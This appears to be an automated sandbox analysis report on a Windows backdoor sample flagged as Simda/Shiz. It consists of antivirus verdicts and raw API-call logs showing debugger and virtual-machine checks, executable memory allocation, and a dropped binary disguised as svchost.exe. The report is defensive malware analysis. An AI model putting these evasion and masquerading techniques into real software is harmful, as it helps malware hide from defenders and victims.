10.4
0-day

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe

Analysis duration: 294s

Last analyzed: 382 days ago

File size: 711.0KB
Static detection Dynamic detection CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN BACKDOOR ULISE
Hawkeye engine
DACN 0.14
FACILE 1.00
IMCLNet 0.74
MFGraph 0.00
Static verdict
Antivirus engines
Engine Result Time Version
Alibaba Backdoor:Win32/Simda.650fe7e4 20190527 0.3.0.5
Avast Win32:Shiz-JT [Trj] 20200306 18.4.3895.0
Baidu Win32.Trojan-Spy.Shiz.b 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Kingsoft None 20200306 2013.8.14.323
McAfee BackDoor-FDOB!53EFB5B31544 20200304 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3d603 20200306 1.0.0.1
Static indicators
Queries the computer name (17 events)
Time & API Arguments Status Return Repeated
1727545298.203125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.078125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.094125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.343625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.358625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.937625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.999625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545401.70325
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.76625
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.89125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.89125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.98425
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545402.03125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545402.06325
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545412.34425
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.2655
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.375375
GetComputerNameW
computer_name: TU-PC
success 1 0
Checks whether the process is being debugged (15 events)
Time & API Arguments Status Return Repeated
1727545297.37525
IsDebuggerPresent
failed 0 0
1727545297.922125
IsDebuggerPresent
failed 0 0
1727545298.984125
IsDebuggerPresent
failed 0 0
1727545299.609125
IsDebuggerPresent
failed 0 0
1727545300.594125
IsDebuggerPresent
failed 0 0
1727545301.688125
IsDebuggerPresent
failed 0 0
1727545301.969125
IsDebuggerPresent
failed 0 0
1727545302.578125
IsDebuggerPresent
failed 0 0
1727545302.641125
IsDebuggerPresent
failed 0 0
1727545302.813125
IsDebuggerPresent
failed 0 0
1727545302.828125
IsDebuggerPresent
failed 0 0
1727545393.391125
IsDebuggerPresent
failed 0 0
1727545394.719125
IsDebuggerPresent
failed 0 0
1727545397.453125
IsDebuggerPresent
failed 0 0
1727545397.531125
IsDebuggerPresent
failed 0 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
Checks the amount of memory in the system, which can be used to detect virtual machines with little available memory (3 events)
Time & API Arguments Status Return Repeated
1727545397.296625
GlobalMemoryStatusEx
success 1 0
1727545401.67225
GlobalMemoryStatusEx
success 1 0
1727545401.3905
GlobalMemoryStatusEx
success 1 0
One or more processes crashed (3 events)
Time & API Arguments Status Return Repeated
1727545397.453125
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebx + eax + 0x64042454], al
exception.instruction_r: 00 84 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 0
registers.edx: 48632448
registers.ebx: 8
registers.esp: 49738724
registers.ebp: 49738800
registers.esi: 72380164
registers.edi: 0
stacktrace:
0x3677782
ReleaseHdwInfo+0x10f72a computerz_hardwaredll+0x1ad98a @ 0x741dd98a
ReleaseHdwInfo+0x10f668 computerz_hardwaredll+0x1ad8c8 @ 0x741dd8c8
ReleaseHdwInfo+0x104336 computerz_hardwaredll+0x1a2596 @ 0x741d2596
ReleaseHdwInfo+0x2ef8a6 computerz_hardwaredll+0x38db06 @ 0x743bdb06
ReleaseHdwInfo+0x2ee611 computerz_hardwaredll+0x38c871 @ 0x743bc871
DirectXVersionProcess+0x4f2c NvidiaMonitorSizeOfProcess-0x3e4 computerz_hardwaredll+0x8539c @ 0x740b539c
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x767462fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76746d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x767477c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7674788a
ReleaseHdwInfo+0x2ed3f0 computerz_hardwaredll+0x38b650 @ 0x743bb650
ReleaseHdwInfo+0x2eea03 computerz_hardwaredll+0x38cc63 @ 0x743bcc63
ReleaseHdwInfo+0x32b3bb computerz_hardwaredll+0x3c961b @ 0x743f961b
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545397.858625
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebp + 0x4245403], al
exception.instruction_r: 00 85 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 192
registers.edx: 50204864
registers.ebx: 8
registers.esp: 53556548
registers.ebp: 53556624
registers.esi: 2
registers.edi: 53557080
stacktrace:
0x3327782
360tptmon+0x20aed @ 0xfc0aed
360tptmon+0x20d1b @ 0xfc0d1b
360tptmon+0x2163f @ 0xfc163f
_itow_s+0x4c _endthreadex-0x35 msvcrt+0x11287 @ 0x76ff1287
_endthreadex+0x6c _beginthreadex-0x6 msvcrt+0x11328 @ 0x76ff1328
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545397.874625
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebp + 0x4245403], al
exception.instruction_r: 00 85 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 44
registers.edx: 50204864
registers.ebx: 0
registers.esp: 53547996
registers.ebp: 53548072
registers.esi: 2002386336
registers.edi: 53548396
stacktrace:
0x3327782
GetSystemInfo+0x1b SetPriorityClass-0x1b9 kernelbase+0xe6cd @ 0x76e8e6cd
New_kernel32_GetSystemInfo@4+0x62 New_kernel32_GetSystemTime@4-0x6c @ 0x63bd7b68
MiniDumpWriteDump+0x4dc2 dbghelp+0x4aafa @ 0x70a9aafa
StackWalk+0x309c MiniDumpReadDumpStream-0x474 dbghelp+0x4457b @ 0x70a9457b
MiniDumpReadDumpStream+0x113f MiniDumpWriteDump-0x20a dbghelp+0x45b2e @ 0x70a95b2e
MiniDumpWriteDump+0xf2 dbghelp+0x45e2a @ 0x70a95e2a
?RaiseException@@YAXXZ-0x2d6 crashreport+0x29aa @ 0x734e29aa

success 0 0
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; such buffers usually contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually used for self-unpacking) (50 out of 246 events)
Time & API Arguments Status Return Repeated
1727545298.078125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02450000
region_size: 745472
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.984125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03670000
region_size: 405504
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76789000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76789000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03810000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
Creates an executable file on the file system (1 event)
file C:\Windows\AppPatch\svchost.exe
Creates a suspicious process (1 event)
cmdline C:\Windows\AppPatch\svchost.exe
Drops a binary and executes it (1 event)
file C:\Windows\AppPatch\svchost.exe
Drops an executable into the user's AppData folder (1 event)
file C:\Users\Administrator\AppData\Local\Temp\E8D9.tmp
Executes one or more WMI queries (11 events)
wmi
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1"} WHERE AssocClass = Win32_IDEControllerDevice
wmi select Name, DeviceID from Win32_IDEController
wmi SELECT * FROM Win32_ComputerSystem
wmi ASSOCIATORS OF {Win32_USBController.DeviceID="PCI\\VEN_106B&DEV_003F&SUBSYS_00000000&REV_00\\3&267A616A&0&30"} WHERE AssocClass = Win32_USBControllerDevice
wmi select Name, DeviceID from Win32_SCSIController
wmi select Name, DeviceID from Win32_USBController
wmi SELECT * FROM Win32_DiskDrive
wmi Select * from WmiMonitorConnectionParams
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCI\\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\\3&267A616A&0&68"} WHERE AssocClass = Win32_IDEControllerDevice
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0"} WHERE AssocClass = Win32_IDEControllerDevice
A process created a hidden window (6 events)
Time & API Arguments Status Return Repeated
1727545397.563125
ShellExecuteExW
filepath: C:\Program Files (x86)\DumpUper.exe
filepath_r: C:\Program Files (x86)\DumpUper.exe
parameters: --pep=49736944 --pid=348 --tid=1888 --src=lds --ver=5.1024.1727.514 --rep=0
show_type: 0
failed 0 0
1727545400.96925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="DirectXVersionProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 1472
thread_identifier: 2692
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.03125
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="OpenCLTestProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 1496
thread_identifier: 1920
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.10925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="NvidiaMonitorSizeOfProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 2520
thread_identifier: 2484
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.15625
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="WMITestProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 3036
thread_identifier: 364
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.21925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="UsbDeviceProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 696
thread_identifier: 848
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
Searches running processes, possibly to identify processes for sandbox evasion, code injection or memory dumping (2 events)
Repeatedly searches for a process that is not found; you may want to run a web browser during analysis (50 out of 57 events)
Time & API Arguments Status Return Repeated
1727545297.37525
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.39125
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.39125
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.40625
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.922125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.938125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.938125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.953125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.000125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.016125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.016125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.641125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.594125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.688125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.688125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.703125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.703125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.969125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.969125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.984125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.984125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.578125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.641125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.828125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.844125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.859125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.859125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.875125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.875125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.891125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.891125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.719125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.719125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.734125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.734125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
Creates a process named after a common system process (1 event)
Time & API Arguments Status Return Repeated
1727545297.75025
CreateProcessInternalW
command_line:
inherit_handles: 0
current_directory:
filepath: C:\Windows\AppPatch\svchost.exe
filepath_r: C:\Windows\apppatch\svchost.exe
creation_flags: 0 ()
process_identifier: 2228
thread_identifier: 1428
process_handle: 0x000000e8
thread_handle: 0x000000f4
track: 1
success 1 0
Executes one or more WMI queries to identify virtual machines (8 events)
wmi SELECT * FROM Win32_ComputerSystem
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1"} WHERE AssocClass = Win32_IDEControllerDevice
wmi select Name, DeviceID from Win32_IDEController
wmi ASSOCIATORS OF {Win32_USBController.DeviceID="PCI\\VEN_106B&DEV_003F&SUBSYS_00000000&REV_00\\3&267A616A&0&30"} WHERE AssocClass = Win32_USBControllerDevice
wmi select Name, DeviceID from Win32_SCSIController
wmi select Name, DeviceID from Win32_USBController
